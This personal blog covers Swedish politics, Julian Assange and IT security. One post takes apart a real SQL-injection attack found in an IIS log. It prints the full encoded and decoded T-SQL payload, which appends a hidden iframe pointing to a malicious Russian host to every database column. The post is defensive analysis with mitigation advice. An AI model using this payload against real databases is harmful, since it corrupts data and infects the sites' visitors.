The future ain't what it used to be
As I got older and hopefully somewhat wiser, the feeling of history repeating itself got stronger. I can't say that I know it all or seen it all. Far from it. But I believe so much is lost when we fail to learn from history or even taking it into consideration. I often discuss my hopes and fears for the future as if they have already occurred, hence the name of this journal. Here you'll find my thoughts on politics, IT-security, technology and some personal musings.
Note: This authoring system is homegrown, so all functions are not yet written. Next up: commenting system.
(2010-08-23) So now what?
Looks like the charges against Mr Assange were dropped as soon as they appeared. I'm going to leave it with that for now. I hope it gets sorted out before the speculation gets out of hand. Or should I say MORE out of hand.Whatever the outcome, lets be sensible and rational about it. I hope that the cause of governmental transparency is not forgotten just because of this. I hope that it's all just not forgotten because some starlet forgets to wear her panties or that a well known public figure says something mildly offensive.
I also hope that Pirat partiet can handle the negative publicity and does not lose its chance to upset the status quo.
Tags: Julian Assange
Posted 2010-08-23 by Erik Zalitis, changed 2010-08-23 by Erik Zalitis
(2010-08-21) More thoughts on Julian Assange
It's a few hours since I wrote my last post about the case against Mr Assange. I've thought a lot about it. It seems very suspicious and also very convenient for some people, but I recommend everyone to think carefully before accusing everyone from CIA to the space aliens for this.Given how little we know about the circumstances of this trial everything I say here is highly speculative. But surely Mr Assange must know how much he is under scrutiny, so it seems like a time when he should have had been very careful about what he did. Maybe he thought himself above the law and that he could do whatever he want? But the feeling of being above it all does not make a person a rapist. It's all just very confusing.
If you want my guess, and mind you I know nothing more about this than you do, I don't think he did it. But if he did it, I think two things should happen:
- He must get a fair trial and a just sentence. Who he is means nothing and what he did means everything.
- It must mean nothing to our perception of his work and Wikileaks.
Whatever Julian turns out to be changes nothing about Wikileaks. Nothing at all. And it changes nothing about Pirat Partiet OR about the issues at hand.
Tags: Julian Assange, pirat partiet
Posted 2010-08-21 by Erik Zalitis, changed 2010-08-21 by Erik Zalitis
(2010-08-21) Julian Assange accused of rape
I usually try to steer clear of too political topics in my posts. There are many people doing it much better than I do, so I leave it to them. But politics and IT-security are becoming more and more mixed together, so I feel the need to look at the whole picture here.It was today that the news of Julian Assange's pending arrest for rape reached me. It's just a mere week since I sat in a room with many other interested people and listened to Mr Assange while he spoke about Wikileaks. A few days later "pirat partiet", a very libertarian party fighting against the new big Brother society forming in Europe and Sweden, made a big deal out of their effort to host some of the "Wikileaks" servers here in Sweden. At the time, this looked like a good PR stunt, not to say a display of a will to fight for the cause.
Today, it might spell the end for the party. The elections of 2006 here in Sweden were the first time we saw a broad array of scandals being orchestrated to affect the outcome of the elections. A number of events were blown out of proportions and neither the right wing nor the left wing was above breaking a few scandals. It ranged from a misinterpreted piece of information that accused right wing party leader Fredrik Reinfeldt of being a pedophile to an evident attack on one of the social democrats wireless networks done by people from "Folkpartiet".
This election, two "scandals" have already arisen around Piratpartiet. This might become the third one. It's painful to see as I think Piratpartiet are the only ones that stand opposed to the ever increasing surveillance society that the European Union is becoming. That said I'm not a member of Piratpartiet, as there are many other issues where I disagree with them. If Mr Assange is guilty, let the court handle the punishment.
The issue of our closing down, locking up society using the horrors of child porn and terrorism as a reason to ask for a Carte Blanche to suspend the innocence presumption stands above all this.
Svenska Dagbladet (In Swedish):
http://www.svd.se/nyheter/inrikes/wikileaks-frontman-misstankt-for-valdtakt_5167469.svd
The Local (In English) :
http://www.thelocal.se/28496/20100821/
Wikileaks denies being contacted by the Swedish police:
http://twitter.com/wikileaks/status/21731365419
Tags: Julian Assange, piratpartiet
Posted 2010-08-21 by Erik Zalitis, changed 2010-08-21 by Erik Zalitis
(2010-08-19) Update on the SQL-injection attack
It seems like ISC Sans, a favorite place of mine, has done pretty much the same job as I did. If you think my report was interesting, you should take a look at theirs.And here's some more data on the site (nemohuildiin.ru) referenced in the attack.
Tags: ISC Sans, SQL-Injection
Posted 2010-08-19 by Erik Zalitis, changed 2010-08-19 by Erik Zalitis
(2010-08-12) The ever changing world...
The security landscape is changing, and it is the soft issues that are in motion. When I started growing passionate about IT-security many years ago, I thought it was all about the technology. I fondly remember the time people connected their systems directly to the Internet without firewalls and still seldom got hacked. I remember the first trickle of spam and the network attacks with fancy names like “smurf” and “teardrop”.Technology matters, but I feel that the main issues of today in IT-security are politics, social connections and feelings. After many years of being subjected to a mix of rational analysis and large doses of fear mongering, society is rapidly changing around the ubiquity of “always on” communication. EU is enacting laws in a steady stream, the debate here in Sweden right now revolves around the question if some Manga cartoons are to be considered child porn and off course we have the Wikileaks discussion. The overlying question: must we strive for freedom, safety or a mix of the two?
For me, the answer is clear: freedom does not mix well with too much "safety". I mean, safety is a state that you want to be in. Controlling risk is the road to safety. The problem is that total safety and freedom are mutual exclusives. And paranoid governments want to sell safety for the price of your freedom. That is: civil liberties take a hit. If you think this is fine, let me ask you this: do you trust your government to watch your back all the time to keep you safe? And, do you believe your government is impervious to corruption? In a perfect world, the government is setup primarily to protect itself. Protecting you is second to it protecting itself, since it sees itself as equivalent to all its people. This includes, but this not limited to just you. And that's as right as it gets. It has to work this way, but it's a sobering though for anyone who believes that the best of intentions are good enough.
Am I paranoid? Well, you tell me, I'm only living here. I don't think the government is out to get me. My neighbors are much more likely to do something like that. But it's all about keeping government intrusions to a minimum. Police and security services must function, but do they really need to preempt us? I think great Britain is a good example of what happens when well-meaning people go too far.
So what, should criminals just roam freely? No, that's not my message. Laws are not setup to protect people. They're setup to punish those that hurt others. Deterrence may work, but only for people that are undecided. Real criminals do not expect to get caught. That's why capital punishment does not work! The deterrent effect of most laws works, but only for honest people and often even for those undetermined. So let's keep it there and let the police go no further than keeping those suspected of a crime under surveillance.
Now is probably a good time to get interested in politics. Safety, security and privacy issues are all up in the air and what happens now will for better and worse define our society for years to come. If you live here in Sweden, don’t forget to vote!
Tags: Politics, IT-Security
Posted 2010-08-12 by Erik Zalitis, changed 2010-08-12 by Erik Zalitis
(2010-08-09) De-mystifying an SQL-injection
I’ve written a lot about security and politics lately, but I’m a technician at heart, so I think it’s time to dig into security from a technical stand point. So today, let’s take one of the many SQL-injection attacks out there on the Internet and pick it apart. The code has been urlcoded, so it cannot harm your web browser. Had that not been the case, it would have been too late anyway.A few words of warning
The attack is a very real and fully functional attack that you must not put into an SQL-editor connected to a database server and “run it just to test”. It may actually work and then, congratulations, you’re in deep trouble. Infecting your own database server running as a virtual machine on a private network is probably just fine, as long as you treat it with a flame thrower afterwards. Remember, it’s like having your own vial with a frozen Ebola-virus. It will be fun until it spreads. Ok, let’s be fair, this attack is not a virus or even a worm. It is the effect of a worm or more likely a program scanning all subnets it can find. The difference between the two is that the worm spreads and attacks from servers it has conquered. But I digress…
The semi fictitious scenario
You get an alert from someone claiming to see something weird in the log of a Microsoft IIS server and they believe you’re the expert on the matter. So you logon to the server, but have no idea where to look. The person who alerted you have no idea which log it was and only a vague idea as to when.
This might seem hopeless, but a bit of deductive logic goes a long way. When you open the IIS manager console, you note that all websites store their logs under d:\wwwlogs. So you use the built in search function to search through all *.log-files created during the last week for … Yeah, for what? Good question. This could be tricky, but there has to be something that sticks out in an attack. Searching for ‘ and SELECT does nothing. This is weird you think. But recently you read something about hackers using CAST and VARCHAR. You type that into the search box and restart the search.
Good news: Bingo, you got a hit from the logs.
Bad news: It looks like this:
2010-08-10 15:17:49 192.168.13.13 GET /muchosell/login.asp subPage=form.asp&nr=2&subLink=2;DecLArE%20@s%20VarCHAR(4000);SET%20@S=CASt(0X6465434C417245204054205661526368417228323535292C40632056417243
6861522832353529204445436C615245205441426C655F637552734F5220637572736F5220664F
522053656C45637420612E4E414D452C622E6E414D452046524F4D207379734F626A6543747320
612C735973434F4C754D6E73206220774865726520612E49643D422E496420616E6420612E7874
7970653D27552720616E642028422E78747950653D3939206F5220622E78547970653D3335206F
5220422E78747970653D323331206F7220422E78547970453D31363729204F70656E205461624C
455F635552734F52206645544348206E4578542046726F4D205461626C455F637552736F722049
6E744F2040742C4063205768494C6528404066455443685F7374617455733D302920426547696E
20457845632827757044617465205B272B40742B275D20536554205B272B40632B275D3D727472
696D28634F4E5665727428766152634861522834303030292C5B272B40632B275D29292B634173
742830583343363936363732363136443635323037333732363333443232363837343734373033
413246324636453635364436463638373536393643363436393639364532453732373532463734
363437333246363736463245373036383730334637333639363433443331323232303737363936
343734363833443232333032323230363836353639363736383734334432323330323232303733
373437393643363533443232363436393733373036433631373933413645364636453635323233
453343324636393636373236313644363533452041732056615243684152283130362929272920
4665744348204E4558742046724F6D205461624C455F635572734F7220694E744F2040542C4063
20456E6420436C6F7345205461626C455F435552736F72204445614C4C4F63615445205461424C
655F437572734F5220%20aS%20VARcHar(4000));eXEc(@s);-- 80 - 666.666.666.666 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) 200
Fantastic. What they Sam Hill are we looking for here? A part of the log entry makes sense, though.
2010-08-10 15:17:49 192.168.13.13 GET /company/login.asp subPage=form.asp&nr=2&
Someone tried to access the login-script on one of the web sites. You use the directory name the log was created under to figure out which site it is. It’s called W3C1. The IIS manager tells you that this site hosts the web application called MuchoSell under www.ericade.net. So it must be http://www.ericade.net/muchosell/login.asp.
The tail end of the log entry also makes sense:
80 - 666.666.666.666 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) 200
The attack was against port 80 (standard for web sites), it came from 666.666.666.666 and it claimed to use Internet Explorer 7. It also got a http code 200 back. That means the transaction executed successfully. Is that good or bad in this case?
You probably know that 666.666.666.666 is an impossible ip-address. It’s like those 1-555- telephone numbers you see in Hollywood movies.
But the rest of the code, what is it good for? It really looks kind of useless. Does it even mean something? Yes, it does. A bit of history: the intrusion detection systems that many organizations use can detect SQL-statements sent as parameters in urls. This is bad news for the cracker, and hence the need for obfuscation. The SQL-server actually decodes the weird characters and then interprets them. So if that’s possible, shouldn’t we be able to do the same? The answer is off course yes.
The text is not encrypted; it’s just encoded as hex decimal characters. We need a tool to decode it. Your weapon of choice is “ASCII Hex URL Decoder”, available from http://urldecoder.codeplex.com/. But when you try pasting the text into the program you get an error message stating that “the code must be wrapped in a CAST” statement. CAST is not what you ended up with on your leg after that horrible ski-trip. It’s actually a transact-sql statement telling SQL that it should change one format into another. In this case hex code into varchar. Varchar is a text string, so the CAST-statement must decode it to make it a varchar. After changing the mixed case text to read CAST(0x6 … VARCHAR(4000)) the decoding works and you end up with:
deCLArE @T VaRchAr(255),@c VArChaR(255) DEClaRE TABle_cuRsOR cursoR fOR SelEct a.NAME,b.nAME FROM sysObjeCts a,sYsCOLuMns b wHere a.Id=B.Id and a.xtype='U' and (B.xtyPe=99 oR b.xType=35 oR B.xtype=231 or B.xTypE=167) Open TabLE_cURsOR fETCH nExT FroM TablE_cuRsor IntO @t,@c WhILe(@@fETCh_statUs=0) BeGin ExEc('upDate ['+@t+'] SeT ['+@c+']=rtrim(cONVert(vaRcHaR(4000),['+@c+']))+cAst(0X3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6
469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865
696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D6
53E As VaRChAR(106))') FetCH NEXt FrOm TabLE_cUrsOr iNtO @T,@c End ClosE TablE_CURsor DEaLLOcaTE TaBLe_CursOR
But wait, what’s in the middle of that text? Another set of hex-coded stuff? Yup, hackers love double encoding their attack code to subvert security scanners.
Running the remaing hex code through the decoder yields:
<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>
And put all together, you get this:
2010-08-10 15:17:49 192.168.13.13 GET /muchosell/login.asp subPage=form.asp&nr=2&subLink=2;DecLArE%20@s%20VarCHAR(4000);SET%20@S=deCLArE @T VaRchAr(255),@c VArChaR(255) DEClaRE TABle_cuRsOR cursoR fOR SelEct a.NAME,b.nAME FROM sysObjeCts a,sYsCOLuMns b wHere a.Id=B.Id and a.xtype='U' and (B.xtyPe=99 oR b.xType=35 oR B.xtype=231 or B.xTypE=167) Open TabLE_cURsOR fETCH nExT FroM TablE_cuRsor IntO @t,@c WhILe(@@fETCh_statUs=0) BeGin ExEc('upDate ['+@t+'] SeT ['+@c+']=rtrim(cONVert(vaRcHaR(4000),['+@c+']))+<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>') FetCH NEXt FrOm TabLE_cUrsOr iNtO @T,@c End ClosE TablE_CURsor DEaLLOcaTE TaBLe_CursOR;eXEc(@s);-- 80 - 666.666.666.666 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) 200
You fix the mixed case characters and the final code is:
GET /muchosell/login.asp subPage=form.asp&nr=2&subLink=2;DECLARE @s VARCHAR(4000);SET @S=DECLARE @T VARCHAR(255),@c VARCHAR(255) DECLARE TABLE_CURSOR CURSOR fOR SELECT a.NAME,b.nAME FROM sysObjeCts a,sYsCOLuMns b WHERE a.Id=B.Id and a.xtype='U' and (B.xtyPe=99 oR b.xType=35 oR B.xtype=231 or B.xTypE=167) OPEN TABLE_CURSOR FETCH NEXT FROM TABLE_CURSOR INTO @t,@c WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@t+'] SET ['+@c+']=rtrim(CONVERT(VARCHAR(4000),['+@c+']))+<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>') FETCH NEXT FROM TABLE_CURSOR INTO @T,@c END CLOSE TABLE_CURSOR DEALLOCATE TABLE_CURSOR;EXEC(@s);--
Sweet! But what does it do, and did it work?
Now this is where it gets tricky. I’ll try to pick it apart for you.
GET /muchosell/login.asp subPage=form.asp&nr=2&subLink=2;
This is the start of the GET statement that normally comes from a web browser, but in this case it’s from the attack program instead. It request that web server runs login.asp with three parameters: subpage, nr and subLink. The attack starts with subLink. The attack program has somehow figured out that subLink expects a number. It could have done that by looking at the links on the site that use those parameters. So it does not use the standard apostrophe to break out of the SQL-statement, since it’s likely not used in the code. Remember that SELECT * FROM table WHERE id=2 is valid for numerical values, whereas SELECT * FROM table WHERE name=’Erik’ requires apostrophes. This is also why escaping apostrophes does not fix all security holes, since the apostrophes are not used with numbers. Damn!
Then it continues by adding 2;DecLArE%20@s%20VarCHAR(4000);SET%20@S=CASt (…) to the parameter. It obviously expects this to go through unhindered to the database layer. And %20 is just urlcode for white space. Let’s rip it apart.
2;
The innocent 2 and a semi-colon which means “end of statement.”
DecLArE @s VarCHAR(4000);
This part creates a variable called s and casts it as VARCHAR with up to 4000 characters of readable bytes.
SET @S=CASt(
This part sets “s” as the result of running cast on the long stream of hex coded gibberish. The result fed into s is clear text, since it has been decoded. When done, s is set to:
deCLArE @T VaRchAr ( … blah blah blah …) TaBLe_CursOR
Quite interesting stuff in that s-variable, no? Yeah, my interests are a bit weird, I know…
;EXEC(@s);--
And the grand finally, run whatever you put into the s-variable on the SQL-server.
Ok, that begs the question, what does the code stored in “s” do? We have to pick that apart too. Got a headache yet? Good! Here’s what was decoded and put into s:
deCLArE @T VaRchAr(255),
The variable T is a string of characters with up to 255 characters.
@c VArChaR(255)
The variable c is another string of characters with up to 255 characters.
DEClaRE TABle_cuRsOR cursoR fOR SelEct a.NAME,b.nAME FROM sysObjeCts a,sYsCOLuMns b wHere a.Id=B.Id and a.xtype='U' and (B.xtyPe=99 oR b.xType=35 oR B.xtype=231 or B.xTypE=167)
This statement is geared towards a Microsoft SQL server and it tries to get a list of all tables and their fields for tables that are user-created. It does not specify a database, so the statement uses whatever database the database user has set as their default. The result is presented as a cursor called TABLE_CURSOR. A cursor is mechanism to manipulate a data set. TABLE_CURSOR makes the names of the aforementioned tables and fields available. This is the list of targets in the database that the script will inject the code into.
Open TabLE_cURsOR
Once created, the cursor is opened.
fETCH nExT FroM TablE_cuRsor IntO @t,@c WhILe(@@fETCh_statUs=0)
It then feeds the data into the variables t and c and iterates through the statements below until it runs out of data. T is the table and c is the column (field). The statement iterates through all fields in all tables.
BeGin
Begin starts a block of statements belonging together.
ExEc('upDate ['+@t+'] SeT ['+@c+']=rtrim(cONVert(vaRcHaR(4000),['+@c+']))+cAst(0X3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6
469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865
696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D6
53E As VaRChAR(106))')
Exec runs an update on all rows changing the data under the column specified in @c in the table specified in @t. The "rtrim(cONVert(vaRcHaR(4000),['+@c+']))" part makes sure that the already present data is retained and the data it then tries to add is decoded as “<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>”.
FetCH NEXt FrOm TabLE_cUrsOr iNtO @T,@c
Gets the next victim from the list and feeds into the variables T and c.
End
Ends the statements. Now it iterates through everything between BEGIN and END again, if there’s anything left to get with TABLE_CURSOR.
When the run through of TABLE_CURSOR is done, it’s closed.
ClosE TablE_CURsor
Closing the cursor.
DEaLLOcaTE TaBLe_CursOR
Nice of it to actually clean up after trashing the place.
So in short, it feeds the iframe-code into every column for every row it can get its hand on, oh the humanity!
That’s all good and fine, but did the attack succeed? Nothing so far gives us any information. Sorry, there are no good clues in this log. Or are there? The code references “sysObjects” and “sysColumns”, which only exist in Microsoft SQL server. It also uses semi-colons, which makes sure it will never work on a MySQL-based server. If you know that the SQL-backend is running anything else that Microsoft SQL, this particular code will most likely not work at all.
That is a good start. But you must be sure, so you connect directly the SQL-server and go through the tables in the database that the web application uses. If the attack was successful, most fields would be filled with the <iframe>-code.
But you’re not satisfied, so you download firebug to your Firefox browser and make sure both are patched to the latest version. You also run them on a virtual machine that is setup with a non-persistent disk to prevent the infection from surviving a reboot. Then you surf to the site and use Firebug to go through the code, searching for the pesky <iframe>.
If all those three things show no evidence of a successful attack, you’re probably in the clear. I said “probably”. Good. Next up for you is a cup of coffee and a chat with the developers.
The attack works the same way some burglars try to open every door on every house in a neighborhood. If the door does not open, they try the next one. There are often people forgetting to lock their doors when they get home. And there are many web servers not properly secured.
What must be done to secure a web application depends on how the application is built, but there are a few general rules:
Input must be cleaned and preferably checked. A parameter expecting a number must not accept anything else. All input data must have a maximum and a minimum size. Everything that does not fit the constraints must be stripped or discarded.
The web application must not have more permissions or privileges than it needs. E.g. does it really need exec-privileges?
The code must not echo error messages from the database layer. Create a connection object and verify if it returns an error. In that case, print a generic error like “The application has experienced a problem and your request could not be completed. Please call your system administrator.”
At the end of the day you hopefully get to write a report stating that you sound the “all clear” but recommend a code review and a security analysis. On a very sensitive system, you might want to suggest that the manager contact a company specializing in penetration testing.
Tags: SQL injections, code analysis, best practise
Posted 2010-08-09 by Erik Zalitis, changed 2010-08-12 by Erik Zalitis
(2010-08-03) "The report of Internet's death was an exaggeration"
So what’s up in the security world? Right now it’s business as usual with few new wide-spread attacks. But when it comes to blended mixtures of old attacks, there’s really no slowdown to be seen. During the month of October 2009, we saw a global surge in spam, but I doubt people cared too much about it. It seems to me that the Internet works a bit like the human body. There is always something that the immune defense system has to attack and destroy. We only feel sick when the fight isn’t going so well. When I originally wrote this text in October of 2009, my left ear was under attack by evil bacteria’s and I had a mild fever. A few days later I was right as rain, so it obviously didn't kill me. The same is true about the Internet, when it gets “sick”. A few years ago, a prominent doom sayer wrote that the Internet will fail in 2006. Needless to say, it didn’t happen. In 2008 an all out attack on the root DNS servers was unsuccessful and the people betting on the death of the Internet have their eyes set on 2012.Would it be pretentious of me to laugh at them in advance, you think?
“There's always an Arquillian Battle Cruiser, or a Corillian Death Ray, or an intergalactic plague that is about to wipe out all life on this miserable little planet, and the only way these people can get on with their happy lives is that they Do... Not... Know about it!”
- K, ”Men in black”
Oh, by the way, the headline is a reference to Mark Twain's famous quote "The report of my death was an exaggeration". In Mr. Twain's case it's not a rumor anymore, but the Internet should still be alive when you read this text on it.
Tags: Philosophy, Mark Twain
Posted 2010-08-03 by Erik Zalitis, changed 2010-08-04 by Erik Zalitis
(2010-08-02) Attack of the killer shortcuts (From outer Redmond)
I know. It’s a week too early for the monthly Microsoft patches but taxes, death and zero day exploits wait for nobody. Today it’s the third one that is lurking.Microsoft will release a bulletin with an associated security patch in the evening. (Update: it's now available as MS10-046) This security patch fixes all supported operating systems.
Supported means that if you’re using Windows XP Service Pack 2 and lower or Windows 2003 Service Pack 1 and lower, you’re out of luck. If you use any version of Windows 2000 you’re in even more problem, since the whole operating system is considered obsolete. This is important to understand, since the vulnerability affects all Windows operating systems from 2000 up to and including Windows 7.
HOW DOES IT WORK?
In short: when you open a folder containing a shortcut pointing to a malicious file, you automatically "get your computer hacked".
The base problem has to do with the icon associated with a shortcut. A shortcut, you say? Yes, the normal shortcut file with its .lnk extension. It is in reality called a “shell link”, but most people know it as the nifty function they use to create a link to a file from their desktop. Normally when you create a shortcut, the icon for it is, if present, taken from the file that the shortcut leads to. You can off course pick your own, custom icon.
The Windows shell does not check that the icon is a proper image before using it, which can be used execute code through malformed code posing as an icon. The malicious code resides in the file the shortcut points to, so the exploit code is likely to be an executable file and a shortcut file pointing to it. The bad news here is that just opening a folder with an “evil shortcut” inside it in Windows Explorer is enough to run the code. This is because most file listing dialog boxes and Windows Explorer itself display the associated icon of a shortcut. And those icons are automatically loaded when you open the folder.
HOW CAN THIS BE USED AGAINST A COMPUTER?
Malicious shortcuts can be put on a USB-drive and used to attack a Windows PC with a logged in user. This attack works well with network drives and can even work by fooling a user to surf to a malicious site.
Please note that you only have to display the shortcut in Windows Explorer or any other application that tries to load the icon to be at risk.
Servers are less of problem here since no sane administrator would use the server as a workstation. At least I hope so. Citrix servers pose a bigger problem. Hopefully most Citrix servers disallow users from doing potentially dangerous things like surfing to the Internet or opening Windows explorer. But, the common file dialog box can also display icons, so you could probably get hurt by using the “Open files” function and browsing to a folder containing a malicious shortcut.
Clients are at a much higher risk, since browsing folders is a very common task for most users.
The official bulletin from Microsoft:
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
The official advisory from Microsoft:
http://www.microsoft.com/technet/security/advisory/2286198.mspx
ISC Sans:
http://isc.sans.edu/diary.html?storyid=9304
Tags: Microsoft Security, Out of band, MS10-046, KB2286198, zero day exploit
Posted 2010-08-02 by Erik Zalitis, changed 2010-08-03 by Erik Zalitis
(2010-07-15) Bruce Schneier on privacy
I don't know if any of you read Bruce Schneiers excellent security news letter. But in the issue that came out in April 2010, Bruce has this to say about privacy:"(...) you've got a whole lot of tech CEOs proclaiming the death of privacy -- especially when it comes to young people.
It's just not true. People, including the younger generation, still care about privacy. Yes, they're far more public on the Internet than their parents: writing personal details on Facebook, posting embarrassing photos on Flickr and having intimate conversations on Twitter. (...)
Here's the problem: The very companies whose CEOs eulogize privacy make their money by controlling vast amounts of their users' information. "
Now this is a bit unexpected to hear from Mr. Schneier. I like his reasoning, but I believe he is a bit to optimistic about the general knowledge of privacy among most people. When you hear about privacy, the discussion is always about governments spying on the people it should protect and respect. This is indeed a serious issue, but far fewer worry about corporation gathering your personal data. And almost noone fears the issue of ordinary people spying on and collecting information about other ordinary people.
What gives?
Tags: Bruce Schneier, Privacy
Posted 2010-07-15 by Erik Zalitis, changed 2010-07-15 by Erik Zalitis
(2010-07-14) It’s just not fair!
You may think of them as super-geniuses doing the impossible, villains bringing the Internet to its knees or heroes “sticking it to the man”.
Forgive me for not being impressed, but I never have had any high thoughts about those so called “hackers”. I’m talking about “hackers” in the meaning “people that attack and subvert IT-systems” not the positive term meaning “computer wizards”.
My sympathy goes to the embattled system administrators fighting an unfair fight to keep systems secure. Ok, let’s be honest. My beef is not with the people finding, documenting and communicating vulnerabilities to the world. They deserve a big collective thank you-note. I’m just tired of how media tries to give the cyber-villains an almost godlike status. They miss out quite a few things about how tilted the balances are.
Here’s my (incomplete!) top 10 list why hacking is so unfair to us defending the networks. When I use the term “we” I refer to any organization, corporation or group of people owning an Internet presence that they’re trying to keep secure. This essay covers a general view of security problems that we all can relate to, not a state of any specific entity.
10. We can’t see them in their true form – they see us only that way
“The ultimate in disposing one's troops is to be without ascertainable shape. Then the most penetrating spies cannot pry in nor can the wise lay plans against you.”
- Sun Tzu, “The art of war”
We, the defenders, have a shape and a size. As does the systems that we seek to defend. The assets we protect are most likely physical to a certain degree. Consider the cost of finding information about us: it’s relatively small. We want to be found as we want to be seen. Hackers prefer to be anonymous and hard to trace. You do the math.
9. They’re simple – we’re complex.
“Fatal accidents never have just a single cause, they happen at the end of a whole series of errors.”
- Charles Stross, “The Fuller memorandum”.
As the size of the organization grows, so does the complexity. But don’t forget that time works against us as well. We install new servers, setup support systems, install applications, add functions, add features and create our own programs and scripts. Over time many of these become obsolete, forgotten or we may stop developing them. We may not even remember if they’re in use or who used to be responsible for their care. Complexity increases exponentially, since systems interact and all components have the potential to affect each other. Especially if we know they shouldn’t be able to. Then we won’t even consider the possibility. Let me give you a list of places where vulnerabilities appear. It’s mercifully short: everywhere. However one type of vulnerability that gets way too little attention is the misconfiguration vulnerability. But I digress.
A good hacker generates just a modest amount of information in our logs that he then tries to remove. In a flood of legitimate activity his actions tend to vanish. Especially if he understand the concept of time (See point 5)
8. They can pull the plug – we can’t
“Beware lest you lose the substance by grasping at the shadow.”
- Aesop
There’s an episode of the TV-series “NCIS” where two of the characters find out that a virus is running rampant on one of their computers. They scramble to stop it the way Hollywood always deals with this situation: by letting the characters frantically hammer the keyboard while going through various stages of panic. Finally their boss walks in and pulls the plug on the computer, solving the problem in the best possible way.
If this is a good idea in real life is hard to say. If you pull the plug you risk losing logged activity not yet written to disk and you may make the hacker to realize that he’s been caught. The calling card of a good hacker is not leaving one. But they may feel the need to erase all logs and evidence if there’s a risk that we’re onto them. So instead of a few “doctored” logs, missing relevant data, we might end up with nothing. Or we might cut them off before we get enough information about what they’re up to and how far they come.
Then there’s the problem with shooting ourselves in the foot but shutting down the network. We kind of need our network and our servers running in order to exist and make money, right? Hackers can drop of the network, lay low and then find a new proxy or connection to strike from.
7. Neither of us have a full overview – They don’t need one
“Every solution breeds new problems..”
- One of Murphy’s laws.
Knowing the land should be our advantage. The hackers have to figure it all out, but we already know everything, right? Maybe. Hopefully.
The problem is that we may have this advantage, but they don’t need it. Before a hacker strikes, he or she does some serious background information gathering … or not. We have to understand that the attacks may not target us specifically. Hackers have their reasons. Often the fact that we have a fast enough network, people trust us and that we have computational power in the form of servers can be reason enough. Automated SQL-injection scripts scour the Internet for vulnerable web/application servers they can exploit and use to attack unsuspecting web surfers trusting them. Or we could have an attacker targeting us that actually needs to do some research about us. Either way, they only need enough information about us to find a way in.
Our security cannot be based on withholding as much information about ourselves as possible. This is “security by obscurity”. But we can use it as a way to make us a tougher target and to win a bit of time. Time that is wasted unless we can also detect them.
6. Hackers have one goal
Concentration is the secret of strength.
- Ralph Waldo Emerson
We have a lot of goals. If we’re a political organization, reach out is an important one. If we’re commercial, the bottom line is king. We also have many smaller goals, mission statements and requirement to attend to. A hacker has one or a few.
We have one thing in common, though: a finite amount of resources.
5. Time is on their side
“Ability is of little account without opportunity.”
- Napoleon Bonaparte
How time works for an attacker depends on their goals. A hacker that needs to get full access to a network may take over one server or a PC and then use it as a bridge head. This allows the hacker to try to monitor network traffic or to attack other systems. He might be able to take over a PC and make it crash. After a while, when it’s back online, he can connect to it again and harvest the passwords-hashes. It’s quite likely that an administrator has logged on to restore the PC, and thus stored his password on it. If the hacker lays low and let some time pass between every action, he can use the time to his advantage. Any suspicious pattern drowns in the sheer amount of data being logged and the logs eventually roll over and it gets deleted. The key is that a good hacker working to get into the network of a known target lays low and awaits opportunities. A hacker just searching for any vulnerable target on the Internet does not necessary need to concern himself with timing at all.
The good news is that time can be on our side too. It depends on if we can detect the intrusion and keep monitoring the hacker while he works. Then time is on our side and we can gather evidence.
And another thing about time: security deteriorates over time. We cannot just stop applying patches, verify settings, harden baselines and monitor traffic. And there’s no guarantee that we won’t miss one or a few systems.
4. We can’t strike back
"For every problem, there is one solution which is simple, neat and wrong."
- Henry Louis Mencken
I admit that the legal side of IT-security is not my strong side. But it’s all about a bit of common sense: as a white hat working for a reputable organization you really should think twice before trying to strike back or “counter-hack” the hacker.
The reasons are mostly legal ones, but as you probably understand there are many bad things that could happen. What if the system the hacker uses belongs to an unsuspecting party, like a corporation or foreign government?
The correct approach to this problem must be involving your incident response team. But this is out of the scope of this discussion.
3. We can’t repair the damage right away
“Haste in every business brings failure.”
- Herodotus
When hack happens, trying to sanitize the systems and get everything working again seems like a good idea. It may actually be a good idea, if you have no intention to catch the perpetrator. If you do, touching the crime scene will invalidate the evidence and probably destroy some or all of the tracks.
2. They gain reputation the same way we lose our
“Character is like a tree and reputation its shadow. The shadow is what we think it is; the tree is the real thing.”
- Abraham Lincoln
They stand to win reputation, money and “goodwill” with organizations that hire hackers to do things like this. The opposite is true for us. We risk losing reputation, money and goodwill with people that trusts us.
1. Hackers only have to find one way in – We have to close all of them.
“If a elderly but distinguished scientist says that something is
possible he is almost certainly right, but if he says that it is
impossible he is very probably wrong.”
- Arthur C. Clarke
“As a young boy, I was taught in high school that hacking was cool. “
- Kevin Mitnick
And number one reason it’s unfair: you can prove a system vulnerable but not the opposite. Proving that something does not exist is known as “proving a negative”. It just can’t be done. Sorry.
It’s the big thing that works against us. If we could apply hard work and reshape the network with all its components into a provably invulnerable network, we could just close the door and leave the whole security problem. But we cannot!
And off course, a hacker can get lucky and gain entrance by exploiting just one single vulnerability. Most of the time, they need more than one, but you can’t prove it isn’t possible to fully own a network through one single vulnerability.
So to conclude: complexity is the killer. It comes back in all of the examples.
Tags: Security, hacking
Posted 2010-07-14 by Erik Zalitis, changed 2010-07-15 by Erik Zalitis
(2010-07-13) Coming soon: a book review of the "Fuller Memorandum".
I've just finished Charles Stross's book the "Fuller Memorandum". I must say it was a very positive experience. A review will come to this site in a few days...Tags: Charles Stross, Fuller memorandum, Atrocity archives, Book review
